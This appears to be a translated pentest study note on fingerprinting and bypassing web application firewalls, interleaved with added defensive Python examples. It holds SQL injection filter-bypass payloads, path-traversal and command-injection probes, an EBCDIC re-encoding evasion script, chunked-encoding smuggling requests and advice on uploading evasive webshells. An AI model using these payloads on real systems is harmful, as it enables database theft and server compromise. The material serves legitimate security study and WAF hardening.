Experience sharing | Pentest notes: Bypassing a WAF

2022-09-29 20:20:52

Preface

Disclaimer: this testing is for learning purposes only. Do not perform unauthorized penetration testing, and do not use it for any other purpose!

This article comes from the daily study notes of our team member goddemon.

goddemon's CSDN blog:

https://blog.csdn.net/qq_33942040?spm=1010.2135.3001.5343

Part 1

Identifying the WAF

(1) Cookie-based identification (e.g. Citrix, Netscaler, Yunsuo WAF, Safedog).
(2) Some identify themselves through a dedicated header (e.g. Anquanbao WAF, Amazon AWS WAF).
(3) Some frequently alter headers and garble characters to confuse the attacker (e.g. Netscaler, Big-IP).
(4) Some expose themselves in the Server header of the response (e.g. Approach, WTS WAF).
(5) Some WAFs reveal themselves in the response body (e.g. DotDefender, Armor, Sitelock).
(6) Other WAFs answer malicious requests with unusual response codes (e.g. WebKnight, 360WAF).
(7) Some WAFs return a pile of junk data and hang your client (e.g. Baidu Yunjiasu).

Detecting the WAF

(1) Send a normal GET request from a browser, intercept it and record the response headers (especially cookies).
(2) Send a request from the command line (e.g. cURL) and examine the response content and headers (without a User-Agent).
(3) Send a GET request to a random open port and grab any banner that may reveal the WAF's identity.
(4) If there is a login page, form page, etc. somewhere, try some common (easily detected) payloads, such as " or 1=1 -- -
(5) Append ../../../etc/passwd to a random parameter at the end of the URL.
(6) Add some attention-grabbing keywords to the end of the URL, such as ' or sleep(5)'
(7) Send a GET request using an outdated protocol such as HTTP/0.9 (HTTP/0.9 does not support POST queries).
(8) Very often the WAF changes the Server header depending on the type of interaction.
(9) Drop-action technique: send a raw FIN/RST packet to the server and observe the response.
(10) Side-channel: examine the timing behaviour of requests and responses.

Common SQL injection filters and bypass methods

Common bypass methods. Step 1: filtered keywords: and, or, union. Possible regex: preg_match('/(and|or|union)/i', $id)

- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'

Step 2: filtered keywords: and, or, union, where

- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'

Step 3: filtered keywords: and, or, union, where, limit

- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

Step 4: filtered keywords: and, or, union, where, limit, group by, select

- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

Step 5: filtered keywords: and, or, union, where, limit, group by, select

- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'

Step 6: filtered keywords: and, or, union, where, limit, group by, select, '

- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)

Step 7: filtered keywords: and, or, union, where, limit, group by, select, ', hex

- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))

Step 8: filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr

- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)

Step 9: filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space

- Blocked: 1 || lpad(user,7,1)
- Bypass: 1||lpad(user,7,1)
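The step-by-step list above is a good argument against keyword blacklists as a defence: every extra keyword is answered by another rewrite. The following is an added example (written for this edit, not from goddemon's notes) that puts the step-1 regex next to the real mitigation. It constructs an in-memory SQLite table to stand in for the page's `users` table; note that `||` is string concatenation in SQLite rather than OR, so the MySQL-specific payloads are only run through the blacklist and the bound-parameter lookup, and a plain `1 or 1=1` is used to show what the concatenated query does.

```python
import re
import sqlite3

# Same idea as the page's step-1 filter preg_match('/(and|or|union)/i', $id),
# written as a Python regex.
BLACKLIST = re.compile(r"(and|or|union)", re.IGNORECASE)

# The page's step-1 bypass payload (MySQL syntax).
STEP1_BYPASS = "1 || (select user from users limit 1) = 'admin'"


def blacklist_blocks(user_input: str) -> bool:
    """True if the step-1 style blacklist would reject the input."""
    return BLACKLIST.search(user_input) is not None


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a two-row users table (not the page's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "guest")])
    return conn


def unsafe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """String concatenation: the query shape every bypass on the page relies on."""
    sql = "SELECT user FROM users WHERE user_id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Bound parameter: the input is a value, never parsed as SQL, so no
    keyword list is needed at all."""
    return [row[0] for row in
            conn.execute("SELECT user FROM users WHERE user_id = ?", (user_id,))]


if __name__ == "__main__":
    db = make_db()
    print("blacklist blocks step-1 bypass:", blacklist_blocks(STEP1_BYPASS))
    print("unsafe_lookup('1 or 1=1') ->", unsafe_lookup(db, "1 or 1=1"))
    print("safe_lookup('1 or 1=1')   ->", safe_lookup(db, "1 or 1=1"))
    print("safe_lookup(step-1 bypass) ->", safe_lookup(db, STEP1_BYPASS))
```

The blacklist lets the page's `||` payload straight through, while the parameterised lookup returns nothing for any of the payloads because the whole string is compared against `user_id` as a value.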

Burp plugin: bypasswaf

Parameters:
① IP spoofing
② Content-Type --> evades the WAF's decoding/evaluation that is keyed to a known content type
③ Host --> a misconfigured WAF may be set up to evaluate requests only against the correct FQDN of the host found in this header; that is what this bypass targets
④ pathinfo --> random path injection --> constructs a path, similar to path fuzzing
⑤ PathObfuscation --> path obfuscation. Original request --> /get/?id=;netstat -ant   Constructed --> /get///?id=;netstat -ant HTTP/1.1
⑥ HPP (parameter pollution). Original attack: /get/?id=;netstat -ant   Parameter-pollution attack: /get/?id=;netstat -ant&id=test&id=test&id=test
⑦ SpaceEncoding (encoding the spaces). Original attack: /get/?id=;netstat -ant   URL encoding, %u encoding: /get/?id=;netstat-ant
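Options ⑤, ⑥ and ⑦ all work on the same weakness: the WAF's rules see the request-target in a different shape from the one the application finally uses. The added example below (my own code, not part of the bypasswaf plugin or goddemon's notes; all function names are assumptions) canonicalizes a request-target the way a rule engine should before matching: it decodes IIS-style `%uXXXX` and ordinary percent-encoding once, collapses repeated slashes and dot segments, and groups every value under its parameter name so polluted parameters are visible instead of hidden behind the first or last occurrence.

```python
import re
from urllib.parse import unquote, unquote_plus


def decode_percent_u(s: str, plus: bool = False) -> str:
    """Decode %uXXXX sequences (urllib does not) and then percent-decode once.
    Only one pass on purpose: double-decoding is a separate check."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote_plus(s) if plus else unquote(s)


def canonical_path(raw_path: str) -> str:
    """Collapse repeated slashes and resolve ./.. segments, so the page's
    obfuscated /get/// maps to the same /get/ the application routes."""
    path = re.sub(r"/{2,}", "/", decode_percent_u(raw_path))
    segments = []
    for seg in path.split("/"):
        if seg == "..":
            if len(segments) > 1:      # never pop the leading root segment
                segments.pop()
        elif seg != ".":
            segments.append(seg)
    return "/".join(segments)


def canonical_query(raw_query: str) -> dict:
    """Group all values under their decoded parameter name (HPP becomes visible)."""
    params = {}
    for pair in (raw_query.split("&") if raw_query else []):
        name, _, value = pair.partition("=")
        params.setdefault(decode_percent_u(name, plus=True), []).append(
            decode_percent_u(value, plus=True))
    return params


def canonicalize(request_target: str) -> dict:
    """One canonical view of a request-target for the rule engine to inspect."""
    raw_path, _, raw_query = request_target.partition("?")
    params = canonical_query(raw_query)
    return {
        "path": canonical_path(raw_path),
        "params": params,
        # parameters supplied more than once: inspect every value, and log it
        "polluted": sorted(n for n, v in params.items() if len(v) > 1),
    }


if __name__ == "__main__":
    # Constructed inputs modelled on the page's PathObfuscation / HPP / SpaceEncoding lines.
    for target in ("/get///?id=;netstat%20-ant&id=test&id=test&id=test",
                   "/get/?id=;netstat%u0020-ant"):
        print(target, "->", canonicalize(target))
```

Every rule should then run against `path` and against each element of `params[name]`, not against the raw target string; `polluted` is worth logging on its own, since repeated parameter names are rare in legitimate traffic.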

Hands-on

Case 1: character-encoding WAF bypass

POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

Character-encoding script

# Python 2 script (urllib.unquote / print statement). Re-encodes a form body
# into another charset, IBM037 (EBCDIC) by default, so that a WAF inspecting
# the raw bytes no longer recognises the SQL keywords while the backend,
# which honours the charset= attribute, still decodes them.
import urllib

def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    result = ""
    equalSign = "="
    ampersand = "&"
    if encodeEqualSign:
        equalSign = equalSign.encode(charset)
    if encodeAmpersand:
        ampersand = ampersand.encode(charset)
    params_list = params.split("&")
    for param_pair in params_list:
        # split on the first '=' only, so a value containing '=' survives
        param, value = param_pair.split("=", 1)
        if urldecodeInput:
            param = urllib.unquote(param).decode('utf8')
            value = urllib.unquote(value).decode('utf8')
        # re-encode name and value in the target charset
        param = param.encode(charset)
        value = value.encode(charset)
        if urlencodeOutput:
            param = urllib.quote_plus(param)
            value = urllib.quote_plus(value)
        if result:
            result += ampersand
        result += param + equalSign + value
    return result

# for IIS
print paramEncode("input1='union all select * from users--")

# prints ������=}�����@���@������@@����@�����``

bypass

POST /sample.aspx?������=��������� HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

������=}�����@���@������@@����@�����``
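The request above only works because the WAF matches on the raw bytes while IIS decodes the body with the charset the request declares. The added example below (my own code, not from the page; the inspector functions and the `SQLI_PATTERN` rule are assumptions standing in for a real rule set) shows the difference: a naive inspector that assumes UTF-8 misses the EBCDIC body, while one that percent-decodes and then decodes with the declared charset, as the backend will, catches it. The EBCDIC body is constructed inline with Python's `cp037` codec, which is the same transformation the page's script performs.

```python
import re
from urllib.parse import unquote_to_bytes

# Stand-in rule; a real WAF has a much larger set, but the point is what it sees.
SQLI_PATTERN = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)

# Constructed sample request body: the page's payload in the page's charset.
PAYLOAD = "input1='union all select * from users--"
EBCDIC_BODY = PAYLOAD.encode("cp037")      # what the page's paramEncode() produces
CONTENT_TYPE = "application/x-www-form-urlencoded; charset=ibm037"


def charset_from_content_type(content_type: str) -> str:
    """Pull the charset= attribute out of a Content-Type header (default utf-8)."""
    m = re.search(r"charset=([\w\-]+)", content_type, re.IGNORECASE)
    return m.group(1) if m else "utf-8"


def naive_inspect(body: bytes) -> bool:
    """Raw-bytes inspector: assumes UTF-8 whatever the request declares."""
    return SQLI_PATTERN.search(body.decode("utf-8", errors="replace")) is not None


def charset_aware_inspect(body: bytes, content_type: str) -> bool:
    """Percent-decode, then decode with the declared charset (as IIS does),
    then inspect. Anything undecodable is treated as suspicious, not passed."""
    charset = charset_from_content_type(content_type)
    try:
        text = unquote_to_bytes(body).decode(charset)
    except (LookupError, UnicodeDecodeError):
        return True
    return SQLI_PATTERN.search(text) is not None


if __name__ == "__main__":
    print("utf-8 body, naive:        ", naive_inspect(PAYLOAD.encode("utf-8")))
    print("ibm037 body, naive:       ", naive_inspect(EBCDIC_BODY))
    print("ibm037 body, charset-aware:", charset_aware_inspect(EBCDIC_BODY, CONTENT_TYPE))
```

A simpler policy is also defensible: only allow the charsets the application actually uses and reject the rest, which removes the decoding step from the WAF entirely.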

Case 2: chunked transfer-encoding WAF bypass. Chunked-encoding bypass, for example. Before the bypass:

POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

bypass

POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked

5;
input
4;
1='u
5;
nion 
4;
all 
5;
selec
4;
t * 
4;
from
5;
 user
3;
s--
0
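The chunked request above defeats a WAF that matches the body as it arrives on the wire. The added example below (my own code, not from the page; function names and the `SQLI_PATTERN` rule are assumptions) reassembles the body before inspection, tolerating the bare `5;` chunk-extension form the page uses, and adds the check a practitioner wants first: the page's request sends both `Content-Length: 110` and `Transfer-Encoding: chunked`, which RFC 7230 forbids a sender from doing, so the safest answer is to reject that framing outright rather than guess which length the backend will honour.

```python
import re

SQLI_PATTERN = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)

# Constructed copy of the page's chunked body, with CRLF line endings.
CHUNKED_BODY = (
    b"5;\r\ninput\r\n"
    b"4;\r\n1='u\r\n"
    b"5;\r\nnion \r\n"
    b"4;\r\nall \r\n"
    b"5;\r\nselec\r\n"
    b"4;\r\nt * \r\n"
    b"4;\r\nfrom\r\n"
    b"5;\r\n user\r\n"
    b"3;\r\ns--\r\n"
    b"0\r\n\r\n"
)


class ChunkedError(ValueError):
    """Malformed chunked framing; the request should be rejected, not guessed at."""


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body. Anything after ';' on a
    chunk-size line is a chunk extension and is ignored (the page uses '5;')."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            raise ChunkedError("chunk-size line not terminated")
        size_field = body[pos:nl].split(b";", 1)[0].strip()
        if not re.fullmatch(rb"[0-9a-fA-F]+", size_field):
            raise ChunkedError("bad chunk size %r" % size_field)
        size = int(size_field, 16)
        pos = nl + 2
        if size == 0:
            return bytes(out)          # last-chunk; trailers are not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedError("truncated chunk or missing CRLF after chunk data")
        out += chunk
        pos += size + 2


def inspect_request(headers: dict, body: bytes) -> str:
    """WAF decision for one request. Header names are assumed already
    normalised to canonical case by the caller."""
    te = headers.get("Transfer-Encoding", "").lower()
    if "chunked" in te:
        if "Content-Length" in headers:
            return "reject: Content-Length and Transfer-Encoding both present"
        try:
            body = dechunk(body)
        except ChunkedError as exc:
            return "reject: " + str(exc)
    text = body.decode("utf-8", errors="replace")
    return "block" if SQLI_PATTERN.search(text) else "allow"


if __name__ == "__main__":
    page_headers = {"Transfer-Encoding": "chunked", "Content-Length": "110"}
    print(inspect_request(page_headers, CHUNKED_BODY))
    print(inspect_request({"Transfer-Encoding": "chunked"}, CHUNKED_BODY))
```

With the conflicting `Content-Length` removed, the reassembled body is the original `input1='union all select * from users--` and the same rule that caught the plain request catches this one.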

Common WAF bypasses

① Safedog bypass. SQL injection past Safedog: inline (version) comment bypass, /*!80000aaa*/ --> the content inside is commonly of the /*!50001*/ kind, for example:

order/*!80000aaa*/by/*!80000aaa*/16

File upload past Safedog. ① Bypassing the extension check: Content-Disposition: is not handled well; once its length grows to 48930, Safedog's upload protection stops working, for example:

② Bypassing content inspection: use an AV-evading webshell. ③ Bypassing traffic inspection: bypass with AntSword, or simply upload a large webshell (大马).
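The inline-comment trick in ① works because `/*!NNNNN ... */` is read one way by the WAF and another by MySQL: the server executes the inner text when its version is at least NNNNN and treats the whole thing as a comment otherwise. A rule engine therefore has to inspect both readings. The added example below (my own code, not from the page; the function names and the `ORDER_BY` rule are assumptions) normalises a query into both views and matches a rule against each, so the page's `order/*!80000aaa*/by/*!80000aaa*/16` is seen as `order by 16` on the version where the comment is skipped.

```python
import re

# MySQL version comment: /*!NNNNN inner */ (5 digits, 6 in newer servers).
VERSION_COMMENT = re.compile(r"/\*!(\d{5,6})(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Stand-in rule for the ORDER BY clause the page's example carries.
ORDER_BY = re.compile(r"\border\s+by\b", re.IGNORECASE)


def normalize_views(sql: str) -> list:
    """Return the two server-side readings of version comments:
    [0] every /*!NNNNN ...*/ treated as a comment (older server),
    [1] the inner text kept as code (server version >= NNNNN).
    Plain comments are removed and whitespace collapsed in both."""
    as_comment = VERSION_COMMENT.sub(" ", sql)
    inner_kept = VERSION_COMMENT.sub(lambda m: " " + m.group(2).strip() + " ", sql)
    views = []
    for view in (as_comment, inner_kept):
        view = PLAIN_COMMENT.sub(" ", view)
        views.append(re.sub(r"\s+", " ", view).strip())
    return views


def matches_any_view(sql: str, rule=ORDER_BY) -> bool:
    """A rule hits if it matches either reading; the WAF cannot know the
    backend's version, so it must not assume the comment is inert."""
    return any(rule.search(view) for view in normalize_views(sql))


if __name__ == "__main__":
    sample = "order/*!80000aaa*/by/*!80000aaa*/16"    # the page's Safedog example
    print(normalize_views(sample))
    print("rule hits:", matches_any_view(sample))
```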
